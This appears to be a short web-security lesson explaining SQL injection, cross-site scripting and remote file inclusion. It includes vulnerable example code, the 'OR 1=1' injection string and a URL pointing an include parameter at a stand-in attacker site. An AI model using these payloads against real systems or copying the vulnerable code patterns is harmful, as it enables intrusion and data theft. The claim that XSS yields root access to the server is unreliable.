SQL Injection (SQLi) is a web attack whereby an adversary is able to execute malicious SQL statements that control a web application's database server.
In the right circumstances, an attacker can use SQL injection to bypass a web application's authentication and authorisation mechanisms and retrieve sensitive contents of an entire database. SQL injection can be used to add, modify, and delete database records, affecting data integrity.
Consider a username and password field on a website. Next, consider the following SQL code:
username = getRequestString("username");
query = "SELECT * FROM Users WHERE Username = " + username;
This code above creates a SELECT statement by adding the variable username to the select string. This variable is fetched from user input (getRequestString).
If an adversary were visit the website and to enter into the username field:
john OR 1=1
Then the SQL statement will look like this:
SELECT * FROM Users WHERE Username = john OR 1=1;
Because OR 1=1 will always be true, this SELECT statement will return all rows from the Users table.
Cross-site Scripting (XSS) is a common attack vector that involves injecting malicious code into a input field on a vulnerable website. Unsanitised input fields that do not check for malicious code will execute the code, which could potentially give adversaries root access to the web server hosting the vulnerable website.
Remote File Inclusion (RFI) is another common attack vector in whereby an adversary can gain access to remote files by exploiting a web application that dynamically includes external files or scripts.
When web applications take in user input and pass them into file include commands (e.g. include($filename . ".php")), it is possible to trick the web application to include remote files with maliciously crafted code.
A typical RFI attack is performed by setting the value of a request parameter to a URL that refers to a malicious file. Consider the following PHP code:
$filename = $_REQUEST["file"];
include($filename . ".php");
The first line of code assigns $filename to the value of the file parameter from the HTTP request. The second line dynamically sets the file to be included using the $filename variable. If the web application is not properly sanitising values, it is possible to exploit this code. Consider the following URL:
http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page
Passing this value to the web application will cause it to be run by the web server.
| « Previous week | Next week » |